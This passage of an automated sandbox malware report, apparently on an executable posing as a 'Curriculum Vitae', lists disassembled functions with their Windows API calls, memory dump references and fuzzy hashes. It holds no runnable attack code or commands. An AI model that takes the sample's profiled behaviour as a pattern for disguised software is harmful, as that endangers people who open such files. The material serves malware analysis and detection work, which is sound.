                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: __wsopen_s
                      • String ID:
                      • API String ID: 3347428461-0
                      • Opcode ID: f8dbaa04a271b171d6c8b3babe8f450562d4a12101c512486d0cdbe28a3d6816
                      • Instruction ID: f0b1ed8621711b554679b59683ec95601e28fef83edc9ec03335f2a29c9a61b2
                      • Opcode Fuzzy Hash: f8dbaa04a271b171d6c8b3babe8f450562d4a12101c512486d0cdbe28a3d6816
                      • Instruction Fuzzy Hash: 2911487190420AAFCB05DF58E940A9A7BF5EF48300F144199F808AB312DB31EA11DBA4
                      Function 00D65000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D64C7D: RtlAllocateHeap.NTDLL(00000008,00D31129,00000000,?,00D62E29,00000001,00000364,?,?,?,00D5F2DE,00D63863,00E01444,?,00D4FDF5,?), ref: 00D64CBE
                      • _free.LIBCMT ref: 00D6506C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                      • Instruction ID: be43e592bab780dbd931fe0169826880624da485b3b18b00e2a445f0f42ef653
                      • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                      • Instruction Fuzzy Hash: 670126722047056BE3318F65E881A5AFBE8FB89370F29051DE18483280EB30A845C7B4
                      Function 00D5E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                      • Instruction ID: eca4c2daa6d3ae240c32806f8b6130475caa47494916e6da5376045bbc3bc2b0
                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                      • Instruction Fuzzy Hash: C7F0F432511A109BCF353A698C05B6A3399DF523B3F140B15FC61921D2CB70D90A8AB5
                      Function 00D39CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen
                      • String ID:
                      • API String ID: 176396367-0
                      • Opcode ID: 5fcd0f157eb8e673970becaf4c912ed0d6f4fa4dedee55b2a127af683eef8bd5
                      • Instruction ID: cf2ab7813cce76ffdf4a195f2624a39c361b5531ac9e42e1922cdc21cf210cda
                      • Opcode Fuzzy Hash: 5fcd0f157eb8e673970becaf4c912ed0d6f4fa4dedee55b2a127af683eef8bd5
                      • Instruction Fuzzy Hash: 32F0AFB26016016ED7259F29D806AAABB98EB44760F10852AFA1ACB1D1DB71E514CAB0
                      Function 00D64C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,00D31129,00000000,?,00D62E29,00000001,00000364,?,?,?,00D5F2DE,00D63863,00E01444,?,00D4FDF5,?), ref: 00D64CBE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: ed7aa91ebd2cc012b133024876110e2a0c1c8d5ea3a98654336df05b5c51d282
                      • Instruction ID: 749becd1bda081736fc5952d81f9682c2d4125a54dd68a1edca9e85088716113
                      • Opcode Fuzzy Hash: ed7aa91ebd2cc012b133024876110e2a0c1c8d5ea3a98654336df05b5c51d282
                      • Instruction Fuzzy Hash: 2FF0BE316032246BDB216F679D09B5A3788AFD17A1B1A4125BC1AEA380CB30D80586F0
                      Function 00D63820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6,?,00D31129), ref: 00D63852
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: b27f2fd06148db70b4ca0550bf635c8e4d175ea0369b5adbf67043d34d5914a8
                      • Instruction ID: 183caaa5e9bfe123b8869cee00d71fc97cd3215e400e7f45a4e7cdc392797dff
                      • Opcode Fuzzy Hash: b27f2fd06148db70b4ca0550bf635c8e4d175ea0369b5adbf67043d34d5914a8
                      • Instruction Fuzzy Hash: E6E0ED31202325ABEA212AA79C05BDA3749EF827B1F0D0020BC45E7981CB21DE0282F1
                      Function 00D34F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(?,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34F6D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: bb71adf9a483a174ce74382c2420488df006cb90fc587761a5f04c45b3332f47
                      • Instruction ID: 022021f98e4a0c1553d3a6f21e52ac55618af1fefbdc9b98222a224a2b6531bf
                      • Opcode Fuzzy Hash: bb71adf9a483a174ce74382c2420488df006cb90fc587761a5f04c45b3332f47
                      • Instruction Fuzzy Hash: 79F03071109752CFDB349F65D490812B7E4EF1432971889BEE5DA82611C735A844DF20
                      Function 00D32DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                      Download Yara Rule
                      APIs
                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D32DC4
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LongNamePath_wcslen
                      • String ID:
                      • API String ID: 541455249-0
                      • Opcode ID: cf8bcb862cb3d91ad59093b3ae22628bf38265f5c9f0becc4623ad445cd671db
                      • Instruction ID: 64ff43d0b9283ecabc94818f3e2ccf739131ea7332e684512576368cc31105f2
                      • Opcode Fuzzy Hash: cf8bcb862cb3d91ad59093b3ae22628bf38265f5c9f0becc4623ad445cd671db
                      • Instruction Fuzzy Hash: DCE0CD76A042245BC71092589C06FDAB7DDDFC8790F044171FD0DD7248E960ED808670
                      Function 00DA2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: __fread_nolock
                      • String ID:
                      • API String ID: 2638373210-0
                      • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                      • Instruction ID: fd027342adc3c6a1604a5ca0f7563ffe123dbe255cdab7e86c2f4102f424529b
                      • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                      • Instruction Fuzzy Hash: 32E048B06097005FDF3D6A28A9517B677E4DF4A301F04085EF59F82352E5726845865D
                      Function 00D32B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D33837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D33908
                        • Part of subcall function 00D3D730: GetInputState.USER32 ref: 00D3D807
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D32B6B
                        • Part of subcall function 00D330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D3314E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                      • String ID:
                      • API String ID: 3667716007-0
                      • Opcode ID: 4f0c3df738f571edf1723e948e4c5204579239b169fa149bff78134ddb975e54
                      • Instruction ID: a779601ecab47627e09494df5ba3ac86d1581a37f7b40f87c3270988b96e18fc
                      • Opcode Fuzzy Hash: 4f0c3df738f571edf1723e948e4c5204579239b169fa149bff78134ddb975e54
                      • Instruction Fuzzy Hash: 25E0723270424407CA08BB70B8228BDF34ACBE1321F00247EF243872B3CF208A898332
                      Function 00D7039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNELBASE(00000000,00000000,?,00D70704,?,?,00000000,?,00D70704,00000000,0000000C), ref: 00D703B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 89360f6dfdedf8d7fade171a292a21a3681f49e622037aa10e1d290544277206
                      • Instruction ID: 3af54e036334592b6dbf03791415a2d686280c5e5f647f15a31fefbfed557917
                      • Opcode Fuzzy Hash: 89360f6dfdedf8d7fade171a292a21a3681f49e622037aa10e1d290544277206
                      • Instruction Fuzzy Hash: A7D06C3205020EBBDF028F85DD06EDA3BAAFB48714F014000FE1896120C732E821AB90
                      Function 00D31CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                      Download Yara Rule
                      APIs
                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00D31CBC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: InfoParametersSystem
                      • String ID:
                      • API String ID: 3098949447-0
                      • Opcode ID: 9c04b70297508b1418745ebf753384f42a276260258cdbf666e4d59a3a6c4626
                      • Instruction ID: c93714fdc3025b23e3bfa92cd5bc5a597b5d5c69ab2582535ef0d20d037c9927
                      • Opcode Fuzzy Hash: 9c04b70297508b1418745ebf753384f42a276260258cdbf666e4d59a3a6c4626
                      • Instruction Fuzzy Hash: AFC09236290306AFF3148B81BC4EF1077A4A348B00F049001F70DB9AE3C3A328A5EA65
                      Function 00D4FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction ID: 076a4d23add64f55f33887a460d4e120d8bc311aaca5c48158a1424f7014d662
                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction Fuzzy Hash: 2731E275A00109DBC718CF59D4C0A69FBA6FF49300B2886A5E84ACF666D731EDC1CBE0
                      Function 03BB22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                      Download Yara Rule
                      APIs
                      • Sleep.KERNELBASE(000001F4), ref: 03BB22B1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2111540426.0000000003BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3bb0000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction ID: 9908ed4135bf1c96294756aa2c63a05c24ffad4a0790737be072801ee267c245
                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction Fuzzy Hash: 59E0BF7494010E9FDB00EFB8D5496AE7BB4EF04301F1006A1FD01D2280DA7099508A62

                      Non-executed Functions

                      Function 00DC9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00DC961A
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DC965B
                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00DC969F
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DC96C9
                      • SendMessageW.USER32 ref: 00DC96F2
                      • GetKeyState.USER32(00000011), ref: 00DC978B
                      • GetKeyState.USER32(00000009), ref: 00DC9798
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DC97AE
                      • GetKeyState.USER32(00000010), ref: 00DC97B8
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DC97E9
                      • SendMessageW.USER32 ref: 00DC9810
                      • SendMessageW.USER32(?,00001030,?,00DC7E95), ref: 00DC9918
                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00DC992E
                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DC9941
                      • SetCapture.USER32(?), ref: 00DC994A
                      • ClientToScreen.USER32(?,?), ref: 00DC99AF
                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DC99BC
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DC99D6
                      • ReleaseCapture.USER32 ref: 00DC99E1
                      • GetCursorPos.USER32(?), ref: 00DC9A19
                      • ScreenToClient.USER32(?,?), ref: 00DC9A26
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DC9A80
                      • SendMessageW.USER32 ref: 00DC9AAE
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DC9AEB
                      • SendMessageW.USER32 ref: 00DC9B1A
                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DC9B3B
                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DC9B4A
                      • GetCursorPos.USER32(?), ref: 00DC9B68
                      • ScreenToClient.USER32(?,?), ref: 00DC9B75
                      • GetParent.USER32(?), ref: 00DC9B93
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DC9BFA
                      • SendMessageW.USER32 ref: 00DC9C2B
                      • ClientToScreen.USER32(?,?), ref: 00DC9C84
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DC9CB4
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DC9CDE
                      • SendMessageW.USER32 ref: 00DC9D01
                      • ClientToScreen.USER32(?,?), ref: 00DC9D4E
                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DC9D82
                        • Part of subcall function 00D49944: GetWindowLongW.USER32(?,000000EB), ref: 00D49952
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC9E05
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                      • String ID: @GUI_DRAGID$F$p#
                      • API String ID: 3429851547-638943876
                      • Opcode ID: d5e730b0d29dabf2c0f7219ae4a54551f893ce5d9884dd6de7d8ad54f8fac89b
                      • Instruction ID: cdff7f03760f7564cfc29341aee02c21bbce4fa35ada8ea871b2b630dd2fe05c
                      • Opcode Fuzzy Hash: d5e730b0d29dabf2c0f7219ae4a54551f893ce5d9884dd6de7d8ad54f8fac89b
                      • Instruction Fuzzy Hash: E0426934204202AFDB25CF24C868FAABBE5EF89310F14065DF699972E1D731E955CF61
                      Function 00DC4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00DC48F3
                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00DC4908
                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00DC4927
                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00DC494B
                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00DC495C
                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00DC497B
                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00DC49AE
                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00DC49D4
                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00DC4A0F
                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00DC4A56
                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00DC4A7E
                      • IsMenu.USER32(?), ref: 00DC4A97
                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DC4AF2
                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DC4B20
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC4B94
                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00DC4BE3
                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00DC4C82
                      • wsprintfW.USER32 ref: 00DC4CAE
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DC4CC9
                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DC4CF1
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DC4D13
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DC4D33
                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DC4D5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                      • String ID: %d/%02d/%02d
                      • API String ID: 4054740463-328681919
                      • Opcode ID: 75ab58d7723575599ce9818911089e95b727d533c700fcc521c83e7c0c2908ac
                      • Instruction ID: c16503fd7637c0bc081cde4d16cabdb55fd2e7c9af532572715cf38934fdcd9c
                      • Opcode Fuzzy Hash: 75ab58d7723575599ce9818911089e95b727d533c700fcc521c83e7c0c2908ac
                      • Instruction Fuzzy Hash: 7612DE71600216ABEB258F28CD59FAE7BB8EF45310F14412DF51AEB2A1DB74D941CB70
                      Function 00D4F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D4F998
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D8F474
                      • IsIconic.USER32(00000000), ref: 00D8F47D
                      • ShowWindow.USER32(00000000,00000009), ref: 00D8F48A
                      • SetForegroundWindow.USER32(00000000), ref: 00D8F494
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D8F4AA
                      • GetCurrentThreadId.KERNEL32 ref: 00D8F4B1
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D8F4BD
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D8F4CE
